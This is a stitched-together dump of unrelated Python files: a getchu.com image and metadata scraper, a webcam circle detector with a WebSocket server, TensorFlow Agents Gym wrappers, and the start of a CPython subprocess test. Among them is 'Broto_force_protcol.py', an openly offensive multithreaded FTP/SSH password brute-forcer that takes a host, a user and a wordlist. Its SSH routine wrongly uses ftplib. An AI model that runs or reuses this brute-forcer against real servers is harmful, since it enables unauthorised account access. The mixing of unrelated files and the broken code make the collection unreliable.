# 这里控制缓存使用,设置为False则无视缓存,一般情况下,只需要设置 auto_use_stage1_cache 和 auto_use_stage2_cache 为 False 就行了。
auto_use_stage1_cache = True
auto_use_stage2_cache = True
auto_use_stage3_cache = True
# 发起下一次请求的间隔
req_interval = 0.3
# 重试次数
retries = 20
# 超时
timeout = 10
# 是否使用代理,中国境内必须使用
use_proxy = True
# 代理地址, 神奇啊,socks5协议居然可以直接用http协议连上
proxies = {
'http': 'http://127.0.0.1:1080',
'https': 'http://127.0.0.1:1080'
}
# -----------------------------------------------------------
if not use_proxy:
proxies = {}
# 默认即可
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'}
# 增加标志,可以进入某些页面
cookies = {'getchu_adalt_flag': 'getchu.com'}
# 这个目前仅用于填充
web_root = 'http://www.getchu.com'
def step1_get_companies_list(html):
'''
输入索引页,解析出作品搜索链接,公司名,和公司ID
:param html:
:return: [[products_search_link, company_name,company_id], ...]
'''
# 这里使用正则表达式直接挖出来
companies_link_name = re.findall(r'<a href="(http://www\.getchu\.com/php/search\.phtml\?search_brand_id=\d+)">(.+?)</a>', html, re.I)
companies_link_name_id = []
for link, name in companies_link_name:
# id_ = link[link.rfind('=')+1:]
# 提取link中的id
id_ = None
params = urllib.parse.splitquery(link)[1].split('&')
for p in params:
ps = p.split('=')
if ps[0] == 'search_brand_id':
id_ = ps[1]
break
companies_link_name_id.append([link, name, id_])
return companies_link_name_id
def step2_get_products_list(html):
'''
输入作品搜索页面,输出作品名,作品链接和作品ID
:param html:
:return: [[product_link,product_name,product_id], ...]
'''
# 这里使用正则表达式直接挖出来
products_link_name = re.findall(r'<a href="\.\.(/soft\.phtml\?id=\d+)" class="blueb">(.+?)</a>', html, re.I)
products_link_name_id = []
for link, name in products_link_name:
# id_ = link[link.rfind('=')+1:]
# 提取link中的id
id_ = None
params = urllib.parse.splitquery(link)[1].split('&')
for p in params:
ps = p.split('=')
if ps[0] == 'id':
id_ = ps[1]
break
products_link_name_id.append([web_root+link, name, id_])
return products_link_name_id
def step3_get_product_info(html):
'''
输出作品页面,输出一个字典
字典包含,角色名,图像名,图像链接,作品名,原画等...
:param html:
:return: {'chara': ... , 'product': ...}
'''
data = {'chara': {}, 'product': {}}
# 检查是否有角色栏
# 如果没有角色栏,则跳过该作品
if html.find(';キャラクター</div>') != -1:
soup = BeautifulSoup(html, 'lxml')
tags = soup.select('table')
# 标题栏
head_tag = soup.find_all('table', {'id': 'soft_table'})[0]
# 先找封面图
## 这个没找到啥特别特征,目前就用序号来查
# 居然有的作品,连封面都没。。。
cover_tag = head_tag.find_all('td', {'rowspan': 2})[0]
_some_tags = re.findall(r'href="\.(/\w+?/\w+?/[\w.]+?)"', str(cover_tag), re.I)
if len(_some_tags) > 0:
cover_pic_link = _some_tags[0]
cover_pic_link = web_root + cover_pic_link
data['product']['cover_pic_link'] = cover_pic_link
data['product']['cover_pic_name'] = cover_pic_link[cover_pic_link.rfind('/')+1:]
else:
data['product']['cover_pic_link'] = None
data['product']['cover_pic_name'] = None
# 没有封面,角色图更加不可能存在了,跳过就行了
# 还是暂时留着吧
# return None
# 然后找原画师,用正则挖
# 当然,可能没有原画。。。
try:
painter = re.findall(r'\n原画:(.+?)\n', head_tag.text, re.I)[0]
painter = painter.split('、')
except IndexError:
painter = ''
data['product']['painter'] = painter
# 找发售日
try:
release_date = re.findall(r'発売日:\s*(\d+/\d+/\d+)\s', head_tag.text, re.I)[0]
except IndexError:
release_date = ''
data['product']['release_date'] = release_date
# 角色介绍栏
chara_tags = None
# 查找哪个是角色介绍栏
for t in tags:
if str(t).find('chara-name') != -1:
chara_tags = t
break
wait_to_check_chara_tags = chara_tags.select('tr')
# 通过检查有没有找到字符串 chara-name 来检查是角色条还是占位条
chara_tags = []
for t in wait_to_check_chara_tags:
if str(t).find('chara-name') != -1:
chara_tags.append(t)
# print('Found {} chara'.format(len(chara_tags)))
# 开始分解角色栏组成部分
for chara_tag in chara_tags:
_l = chara_tag.select('td')
# 角色全身图不一定有
chara_full_pic_tag = None
if len(_l) == 3:
# 该栏有 主图,介绍,全身图
chara_main_pic_tag, chara_content_tag, chara_full_pic_tag = _l
elif len(_l) == 2:
# 该栏只有 主图,介绍
chara_main_pic_tag, chara_content_tag = _l
else:
# 遇到产品id为 1017496 这种,直接跳过
return None
# # 网页结构改变了
# raise AssertionError('你需要再次检查网页,网页结构变了')
chara_main_pic_link = chara_name = chara_full_pic_link = None
# 处理角色主图
if chara_main_pic_tag is not None:
# 有的角色没有任何图像。。。
try:
# 直接用正则表达式把图像链接挖出来
chara_main_pic_link = re.findall(r'src="\.(/\w+?/\w+?/[\w.]+?)"', str(chara_main_pic_tag), re.I)[0]
# 补充网站前缀
chara_main_pic_link = web_root + chara_main_pic_link
except:
pass
# 处理角色名字
if chara_content_tag is not None:
chara_name_tag = chara_content_tag.select('h2', {'class': 'chara-name'})[0]
# 角色名处理有点复杂
# 这里排除掉头衔,有的角色有头衔,例如 鸣濑白羽 的头衔 忘记暑假的少女
# 有的作品,角色名会与CV分成两行,这就需要两行了
# 算了,放弃只挖名字。。。 很麻烦啊,还是包括头衔等一堆东西算了
# 屏蔽这里
# chara_name = str(chara_name_tag.contents[-2]) + str(chara_name_tag.contents[-1])
# # 角色名常见配置 "鳴瀨 しろは(なるせ しろは) CV:小原好美"
# # 先检查括号,有括号就直接用括号来排除;没有括号就检查 CV:,排除掉CV:;如果都没有检测到,这个就是全角色名了
# # 注意要用全角符号
# _pos = chara_name.find('(')
# if _pos == -1:
# _pos = chara_name.find('CV:')
#
# if _pos == -1:
# _pos = None
# chara_name = chara_name[:_pos]
# 去除角色名左右两边多余的空格,但不要去除角色名内部的空格
chara_name = chara_name_tag.text
# 好吧,因为还存在着名字只有一个空格的角色。。。产品ID:27393
# 所以屏蔽以下。。
# chara_name = chara_name.strip()
if len(chara_name) == 0:
raise AssertionError('Found chara name is empty!')
# 处理角色全身图
if chara_full_pic_tag is not None:
# 老办法,使用正则直接挖出来
chara_full_pic_link = re.findall(r'href="\.(/\w+?/\w+?/[\w.]+?)"', str(chara_full_pic_tag), re.I)[0]
chara_full_pic_link = web_root + chara_full_pic_link
# print(chara_main_pic_link, chara_name, chara_full_pic_link)
# 加入表
chara_main_pic_name = chara_full_pic_name = None
if chara_main_pic_link is not None:
chara_main_pic_name = chara_main_pic_link[chara_main_pic_link.rfind('/')+1:]
if chara_full_pic_link is not None:
chara_full_pic_name = chara_full_pic_link[chara_full_pic_link.rfind('/')+1:]
data['chara'][chara_name] = {'chara_main_pic_name': chara_main_pic_name, 'chara_main_pic_link': chara_main_pic_link,
'chara_full_pic_name': chara_full_pic_name, 'chara_full_pic_link': chara_full_pic_link}
return data
else:
return None
company_id2name = {}
def download(link, path):
'''
下载链接到文件
:param link: 下载链接
:param path: 下载文件
:return:
'''
s = requests.Session()
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))
try:
r = s.get(link, timeout=timeout, headers=headers, cookies=cookies, proxies=proxies, verify=False)
except (requests.ConnectionError, requests.Timeout):
return None, None
if r.status_code == 200:
if path is not None:
open(path, 'wb').write(r.content)
return r.status_code, r.content
else:
print('Download link {} failure status_code {}.'.format(link, r.status_code))
return r.status_code, None
if __name__ == '__main__':
# 初始化会话
s = requests.Session()
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))
dataset_root = 'dataset'
os.makedirs(dataset_root, exist_ok=True)
# stage1
print('stage 1')
# 检查有没有现成的公司表
print('Getting company list')
complete_mark = os.path.join(dataset_root, '.complete')
company_list_html_path = os.path.join(dataset_root, 'company.html')
if os.path.isfile(complete_mark) and auto_use_stage1_cache:
print('Use cache')
else:
# 先删除完成标记,避免临界意外
if os.path.isfile(complete_mark):
os.remove(complete_mark)
code = None
try_count = 0
while code != 200 and try_count < retries:
# 获取公司列表
code, _ = download('http://www.getchu.com/all/brand.html?genre=pc_soft', company_list_html_path)
time.sleep(req_interval)
try_count += 1
if code != 200:
raise AttributeError('Download company list html failure with retry {} status_code {}'.format(try_count, code))
# 生成完成标记
open(complete_mark, 'wb')
f = open(company_list_html_path, 'rb').read().decode('EUC-JP', errors='replace')
# 获取公司链接和名字
companies_link_name_id = step1_get_companies_list(f)
#
n_company = len(companies_link_name_id)
# stage2
# 公司数量就 2100 个左右,不使用多线程
print('stage 2')
# 保存搜索页面
for n_id, (company_link, company_name, company_id) in enumerate(companies_link_name_id):
print('({}/{}) Getting company product list. Company name&id: ({}/{})'.format(n_id+1, n_company, company_name, company_id))
# 写入id到公司名的映射表
company_id2name[company_id] = company_name
# 文件夹名用id来替代
company_dir = os.path.join(dataset_root, company_id)
# 建立公司文件夹
os.makedirs(company_dir, exist_ok=True)
complete_mark = os.path.join(company_dir, '.complete')
# 产品列表文件路径
product_list_html_path = os.path.join(company_dir, 'list.html')
if os.path.isfile(complete_mark) and auto_use_stage2_cache:
print('Use cache')
else:
s = requests.Session()
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))
# 先删除完成标记,避免临界意外
if os.path.isfile(complete_mark):
os.remove(complete_mark)
# 添加参数,使所有产品都在同一个页面显示
# 增加限制,限制为最多5000个产品,限制只有pc游戏
# 还可以增加日期限制,只需使用 &start_year=2005&start_month=1&start_day=1&end_year=2025&end_month=12&end_day=30
new_company_link = company_link + '&list_count=5000' + '&genre=pc_soft'
code = None
try_count = 0
while code != 200 and try_count < retries:
# 获取产品列表
code, _ = download(new_company_link, product_list_html_path)
time.sleep(req_interval)
try_count += 1
if code != 200:
print('Download product list html failure with status_code {}, will be retry.'.format(code))
if code != 200:
raise AttributeError(
'Download product list html failure with retry {} status_code {}'.format(try_count, code))
# print('{} 已完成'.format(company_name))
# 设定完成标记,避免重复处理
open(complete_mark, 'wb')
# 保存公司id到公司名映射
json.dump(company_id2name, open(os.path.join(dataset_root, 'id2name.json'), 'w', encoding='utf8'))
# stage3
print('stage 3')
# 数量太多,分开数据下载和处理,这样就算获取失败了,重启不会耗费太多时间
# 使用多线程下载
n_thread = 4
n_failure = 0
no_more = False
command_quene = queue.Queue(maxsize=n_thread)
worker_threads = []
def stage3_download(complete_mark, product_link, product_dir):
# 先删除完成标记,避免临界意外
if os.path.isfile(complete_mark):
os.remove(complete_mark)
# 下载产品网页并保存,如果下载到500页面,可以马上重试,而不是跳过
code = None
try_count = 0
while code != 200 and try_count < retries:
# 获取产品列表
code, _ = download(product_link, os.path.join(product_dir, 'soft.html'))
time.sleep(req_interval)
try_count += 1
if code != 200:
print('Download product info html failure with status_code {}, will be retry.'.format(code))
if code != 200:
print('Download product info html failure with retry {} status_code {}.'.format(try_count, code))
return False
# 设定完成标记,避免重复处理
open(complete_mark, 'wb')
return True
def stage3_worker_run():
global n_failure
while True:
try:
new_cmd = command_quene.get(block=True, timeout=2)
except queue.Empty:
if no_more and command_quene.empty():
break
continue
b = stage3_download(*new_cmd)
if not b:
n_failure += 1
# 启动工作线程
for _ in range(n_thread):
t = Thread(target=stage3_worker_run)
t.start()
worker_threads.append(t)
# 页面下载
for n_id, (company_link, company_name, company_id) in enumerate(companies_link_name_id):
company_dir = os.path.join(dataset_root, company_id)
t2 = open(os.path.join(company_dir, 'list.html'), 'rb').read().decode('EUC-JP', errors='replace')
# 产品链接和名字和id
products_link_name_id = step2_get_products_list(t2)
product_id2name = {}
n_product = len(products_link_name_id)
for n2_id, (product_link, product_name, product_id) in enumerate(products_link_name_id):
print('({}/{}) ({}/{}) Getting product info. Product name&id: ({}/{}) Company name&id: ({}/{})'.
format(n_id+1, n_company, n2_id+1, n_product, product_name, product_id, company_name, company_id))
# 写入产品id到名字的映射表
product_id2name[product_id] = product_name
product_dir = os.path.join(dataset_root, company_id, product_id)
# 新建产品文件夹
os.makedirs(product_dir, exist_ok=True)
complete_mark = os.path.join(product_dir, '.complete')
if os.path.isfile(complete_mark) and auto_use_stage3_cache:
print('Use cache')
else:
# 这部分使用多线程加速
# # 先删除完成标记,避免临界意外
# if os.path.isfile(complete_mark):
# os.remove(complete_mark)
# # 下载产品网页并保存
# r = s.get(product_link, timeout=10, cookies=cookies, proxies=proxies, verify=False)
# time.sleep(req_interval)
# # print(r.status_code)
# if r.status_code != 200:
# print(r.status_code)
# raise AssertionError('download html failure')
# open(os.path.join(product_dir, 'soft.html'), 'wb').write(r.content)
# # 设定完成标记,避免重复处理
# open(complete_mark, 'wb')
command_quene.put([complete_mark, product_link, product_dir], block=True)
# download(complete_mark, product_link, product_dir)
no_more = True
print('waiting worker quit')
for t in worker_threads:
t.join()
# 检查失败数量,不为0就报错退出,因为要全部下载完才进行下一步
if n_failure > 0:
print('n_failure', n_failure)
raise AssertionError('Found n_failure > 0, please restart download')
# 分析页面和提取数据
for n_id, (company_link, company_name, company_id) in enumerate(companies_link_name_id):
company_dir = os.path.join(dataset_root, company_id)
t2 = open(os.path.join(company_dir, 'list.html'), 'rb').read().decode('EUC-JP', errors='replace')
# 产品链接和名字和id
products_link_name_id = step2_get_products_list(t2)
product_id2name = {}
n_product = len(products_link_name_id)
for n2_id, (product_link, product_name, product_id) in enumerate(products_link_name_id):
print('({}/{}) ({}/{}) Generating product info. Product name&id: ({}/{}) Company name&id: ({}/{})'.
format(n_id + 1, n_company, n2_id + 1, n_product, product_name, product_id, company_name,
company_id))
# 写入产品id到名字的映射表
product_id2name[product_id] = product_name
product_dir = os.path.join(dataset_root, company_id, product_id)
t3 = open(os.path.join(product_dir, 'soft.html'), 'rb').read().decode('EUC-JP', errors='replace')
data = step3_get_product_info(t3)
if data is not None:
json.dump(data, open(os.path.join(product_dir, 'data.json'), 'w', encoding='utf8'))
# 保存id名到游戏名映射
json.dump(product_id2name, open(os.path.join(dataset_root, company_id, 'id2name.json'), 'w', encoding='utf8'))
print('Success')
|
circle_detection_with_websocket_server.py
|
import cv2
import numpy as np
import threading
import json
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
server = None
clients = []
class SimpleWSServer(WebSocket):
def handleConnected(self):
clients.append(self)
def handleClose(self):
clients.remove(self)
def run_server():
global server
server = SimpleWebSocketServer('', 9000, SimpleWSServer,
selectInterval=(1000.0 / 15) / 1000)
server.serveforever()
t = threading.Thread(target=run_server)
t.start()
capture = cv2.VideoCapture(0)
t = 100
w = 640.0
last = 0
while True:
ret, image = capture.read()
img_height, img_width, depth = image.shape
scale = w / img_width
h = img_height * scale
image = cv2.resize(image, (0,0), fx=scale, fy=scale)
# Apply filters
grey = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blured = cv2.medianBlur(grey, 9)
# Compose 2x2 grid with all previews
grid = np.zeros([2*h, 2*w, 3], np.uint8)
grid[0:h, 0:w] = image
# We need to convert each of them to RGB from grescaled 8 bit format
grid[h:2*h, 0:w] = np.dstack([cv2.Canny(grey, t / 2, t)] * 3)
grid[0:h, w:2*w] = np.dstack([blured] * 3)
grid[h:2*h, w:2*w] = np.dstack([cv2.Canny(blured, t / 2, t)] * 3)
cv2.imshow('Image previews', grid)
sc = 1
md = 30
at = 40
circles = cv2.HoughCircles(blured, cv2.HOUGH_GRADIENT, sc, md, t, at)
if circles is not None:
# We care only about the first circle found.
circle = circles[0][0]
x, y, radius = int(circle[0]), int(circle[1]), int(circle[2])
print(x / w, y / h, radius / w)
# Highlight the circle
cv2.circle(image, (x, y), radius, (0, 0, 255), 1)
# Draw dot in the center
cv2.circle(image, (x, y), 1, (0, 0, 255), 1)
for client in clients:
client.sendMessage(unicode(json.dumps({'x': x / w, 'y': y / h, 'radius': radius / w})))
cv2.imshow('Image with detected circle', image)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
server.close()
|
Broto_force_protcol.py
|
from colored import fg, bg, attr
import colored
import socket as sock
from Modules import intro
import ftplib
from threading import Thread
import queue
import logging
import paramiko
logging.disable(logging.CRITICAL)
class Brute_Force:
global q
q = queue.Queue()
def __init__(self):
#self.q = queue.Queue()
self.angry1 = colored.fg("green") + colored.attr("bold")
self.angry2 = colored.fg("red") + colored.attr("bold")
self.angry = colored.fg("white") + colored.attr("bold")
print(f"""{self.angry1}
1 - FTP Brute
2 - SSH Brute
0 - back
""")
self.number = str(input("[?]>>"))
if self.number ==str(1) or "use ftp" in self.number :
self.host = str(input("HOST : "))
self.user = str(input("USER : "))
self.passwords = str(input("File : "))
self.passwords = open(self.passwords).read().split("\n")
self.threads = int(input("Threads : "))
print("[+] Passwords to try:", len(self.passwords))
for password in self.passwords:
q.put(password)
for t in range(self.threads):
self.thread = Thread(target=self.ftp_brute)
self.thread.daemon = True
self.thread.start()
if self.number ==str(2) or "use ssh" in self.number:
self.host = str(input("HOST : "))
self.user = str(input("USER : "))
self.passwords = str(input("File : "))
self.passwords = open(self.passwords).read().split("\n")
self.threads = int(input("Threads : "))
print("[+] Passwords to try:", len(self.passwords))
for password in self.passwords:
q.put(password)
for t in range(self.threads):
self.thread = Thread(target=self.ssh_brute)
self.thread.daemon = True
self.thread.start()
if self.number ==str(99) or "back" in self.number :
intro.main()
q.join()
def ftp_brute(self):
try :
while True :
password = q.get()
print(f"{self.angry2}[#] Trying",f"{self.user}:{password}")
try:
server = ftplib.FTP()
server.connect(self.host,port=21, timeout=5)
server.login(self.user, password)
except ftplib.error_perm:
pass
else:
print(f"{self.angry1}[+] Found Crack FTP: \n HOST : {self.host} \n Password : {password} {self.angry}")
with q.mutex:
q.queue.clear()
q.all_tasks_done.notify_all()
q.unfinished_tasks = 0
finally :
q.task_done()
except:
pass
def ssh_brute(self):
try :
while True :
password = q.get()
print(f"{self.angry2}[#] Trying",f"{self.user}:{password}")
try:
server = ftplib.FTP()
server.connect(self.host,port=21, timeout=5)
server.login(self.user, password)
except ftplib.error_perm:
pass
else:
print(f"{self.angry1}[+] Found Crack SSH: \n HOST : {self.host} \n Password : {password} {self.angry} ")
with q.mutex:
q.queue.clear()
q.all_tasks_done.notify_all()
q.unfinished_tasks = 0
finally :
q.task_done()
except :
pass
|
wrappers.py
|
# Copyright 2017 The TensorFlow Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for OpenAI Gym environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import functools
import multiprocessing
import sys
import traceback
import gym
import gym.spaces
import numpy as np
import tensorflow as tf
class AutoReset(object):
"""Automatically reset environment when the episode is done."""
def __init__(self, env):
self._env = env
self._done = True
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._done:
observ, reward, done, info = self._env.reset(), 0.0, False, {}
else:
observ, reward, done, info = self._env.step(action)
self._done = done
return observ, reward, done, info
def reset(self):
self._done = False
return self._env.reset()
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class RandomStart(object):
"""Perform random number of random actions at the start of the episode."""
def __init__(self, env, max_steps):
self._env = env
self._max_steps = max_steps
def __getattr__(self, name):
return getattr(self._env, name)
def reset(self):
observ = self._env.reset()
random_steps = np.random.randint(0, self._max_steps)
for _ in range(random_steps):
action = self._env.action_space.sample()
observ, unused_reward, done, unused_info = self._env.step(action)
if done:
tf.logging.warning('Episode ended during random start.')
return self.reset()
return observ
class FrameHistory(object):
"""Augment the observation with past observations."""
def __init__(self, env, past_indices, flatten):
"""Augment the observation with past observations.
Implemented as a Numpy ring buffer holding the necessary past observations.
Args:
env: OpenAI Gym environment to wrap.
past_indices: List of non-negative integers indicating the time offsets
from the current time step of observations to include.
flatten: Concatenate the past observations rather than stacking them.
Raises:
KeyError: The current observation is not included in the indices.
"""
if 0 not in past_indices:
raise KeyError('Past indices should include 0 for the current frame.')
self._env = env
self._past_indices = past_indices
self._step = 0
self._buffer = None
self._capacity = max(past_indices)
self._flatten = flatten
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low = np.repeat(low[None, ...], len(self._past_indices), 0)
high = np.repeat(high[None, ...], len(self._past_indices), 0)
if self._flatten:
low = np.reshape(low, (-1,) + low.shape[2:])
high = np.reshape(high, (-1,) + high.shape[2:])
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
self._buffer[self._step % self._capacity] = observ
observ = self._select_frames()
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
self._buffer = np.repeat(observ[None, ...], self._capacity, 0)
self._step = 0
return self._select_frames()
def _select_frames(self):
indices = [(self._step - index) % self._capacity for index in self._past_indices]
observ = self._buffer[indices]
if self._flatten:
observ = np.reshape(observ, (-1,) + observ.shape[2:])
return observ
class FrameDelta(object):
"""Convert the observation to a difference from the previous observation."""
def __init__(self, env):
self._env = env
self._last = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low, high = low - high, high - low
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
delta = observ - self._last
self._last = observ
return delta, reward, done, info
def reset(self):
observ = self._env.reset()
self._last = observ
return observ
class RangeNormalize(object):
"""Normalize the specialized observation and action ranges to [-1, 1]."""
def __init__(self, env, observ=None, action=None):
self._env = env
self._should_normalize_observ = (observ is not False and
self._is_finite(self._env.observation_space))
if observ is True and not self._should_normalize_observ:
raise ValueError('Cannot normalize infinite observation range.')
if observ is None and not self._should_normalize_observ:
tf.logging.info('Not normalizing infinite observation range.')
self._should_normalize_action = (action is not False and
self._is_finite(self._env.action_space))
if action is True and not self._should_normalize_action:
raise ValueError('Cannot normalize infinite action range.')
if action is None and not self._should_normalize_action:
tf.logging.info('Not normalizing infinite action range.')
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
space = self._env.observation_space
if not self._should_normalize_observ:
return space
return gym.spaces.Box(-np.ones(space.shape), np.ones(space.shape))
@property
def action_space(self):
space = self._env.action_space
if not self._should_normalize_action:
return space
return gym.spaces.Box(-np.ones(space.shape), np.ones(space.shape))
def step(self, action):
if self._should_normalize_action:
action = self._denormalize_action(action)
observ, reward, done, info = self._env.step(action)
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ
def _denormalize_action(self, action):
min_ = self._env.action_space.low
max_ = self._env.action_space.high
action = (action + 1) / 2 * (max_ - min_) + min_
return action
def _normalize_observ(self, observ):
min_ = self._env.observation_space.low
max_ = self._env.observation_space.high
observ = 2 * (observ - min_) / (max_ - min_) - 1
return observ
def _is_finite(self, space):
return np.isfinite(space.low).all() and np.isfinite(space.high).all()
class ClipAction(object):
"""Clip out of range actions to the action space of the environment."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = self._env.action_space.shape
return gym.spaces.Box(-np.inf * np.ones(shape), np.inf * np.ones(shape))
def step(self, action):
action_space = self._env.action_space
action = np.clip(action, action_space.low, action_space.high)
return self._env.step(action)
class LimitDuration(object):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACTION = 1
_RESET = 2
_CLOSE = 3
_ATTRIBUTE = 4
_TRANSITION = 5
_OBSERV = 6
_EXCEPTION = 7
_VALUE = 8
def __init__(self, constructor):
"""Step environment in a separate process for lock free paralellism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ATTRIBUTE, name))
return self._receive(self._VALUE)
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
self._conn.send((self._ACTION, action))
if blocking:
return self._receive(self._TRANSITION)
else:
return functools.partial(self._receive, self._TRANSITION)
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
self._conn.send((self._RESET, None))
if blocking:
return self._receive(self._OBSERV)
else:
return functools.partial(self._receive, self._OBSERV)
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def _receive(self, expected_message):
"""Wait for a message from the worker process and return its payload.
Args:
expected_message: Type of the expected message.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The reveived message is not of the expected type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == expected_message:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACTION:
action = payload
conn.send((self._TRANSITION, env.step(action)))
continue
if message == self._RESET:
assert payload is None
conn.send((self._OBSERV, env.reset()))
continue
if message == self._ATTRIBUTE:
name = payload
conn.send((self._VALUE, getattr(env, name)))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
conn.send((self._EXCEPTION, stacktrace))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.close()
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
"""Convert data types of an OpenAI Gym environment to 32 bit.
Args:
env: OpenAI Gym environment.
"""
self._env = env
def __getattr__(self, name):
"""Forward unimplemented attributes to the original environment.
Args:
name: Attribute that was accessed.
Returns:
Value behind the attribute name in the wrapped environment.
"""
return getattr(self._env, name)
def step(self, action):
"""Forward action to the wrapped environment.
Args:
action: Action to apply to the environment.
Raises:
ValueError: Invalid action.
Returns:
Converted observation, converted reward, done flag, and info object.
"""
observ, reward, done, info = self._env.step(action)
observ = self._convert_observ(observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
"""Reset the environment and convert the resulting observation.
Returns:
Converted observation.
"""
observ = self._env.reset()
observ = self._convert_observ(observ)
return observ
def _convert_observ(self, observ):
"""Convert the observation to 32 bits.
Args:
observ: Numpy observation.
Raises:
ValueError: Observation contains infinite values.
Returns:
Numpy observation with 32-bit data type.
"""
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
"""Convert the reward to 32 bits.
Args:
reward: Numpy reward.
Raises:
ValueError: Rewards contain infinite values.
Returns:
Numpy reward with 32-bit data type.
"""
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import _testcapi
except ImportError:
_testcapi = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
